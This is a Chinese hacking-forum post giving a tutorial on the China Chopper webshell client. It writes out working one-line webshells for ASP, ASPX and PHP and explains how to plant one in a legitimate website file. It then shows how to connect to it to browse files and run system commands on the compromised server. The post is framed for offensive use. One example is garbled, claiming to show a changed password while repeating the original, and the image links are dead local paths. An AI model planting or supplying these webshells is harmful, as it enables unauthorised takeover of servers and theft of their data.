跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

精选回复

发布于

中国菜刀使用教程

5a28061fd87d1.png

双击打开,软件运行界面如图:

file:///C:/Users/DELL/AppData/Local/Temp/msohtmlclip1/01/clip_image001.png

首先说一下菜刀的功能,菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。

asp的一句话是:<%eval request("pass")%>

aspx的一句话是:<%@ PageLanguage="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

php的一句话是:<?php @eval($_POST['pass']);?>

这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成drvfan,那么改完之后就是这样的:

<%eval request("pass")%>

其他同理。

要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。

当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp文件,这个asp文件的全部内容就只有一个一句话,也是可以的。

插入了一句话木马,下面就是连接了。

在菜刀主界面,右击,选择“添加”,如图:

file:///C:/Users/DELL/AppData/Local/Temp/msohtmlclip1/01/clip_image002.png

在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的不用填,如图:

file:///C:/Users/DELL/AppData/Local/Temp/msohtmlclip1/01/clip_image003.png

填完之后单击“添加”,就可以了。

添加完毕后,你的这个一句话的shell会显示到主界面里,右击它,选择“文件管理”,就可以看到网站上的文件了,如图:

file:///C:/Users/DELL/AppData/Local/Temp/msohtmlclip1/01/clip_image004.png

在菜刀里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能,如图:

file:///C:/Users/DELL/AppData/Local/Temp/msohtmlclip1/01/clip_image005.png

如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了,如图:

file:///C:/Users/DELL/AppData/Local/Temp/msohtmlclip1/01/clip_image006.png

其他的功能自己摸索吧,我就不多说了。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。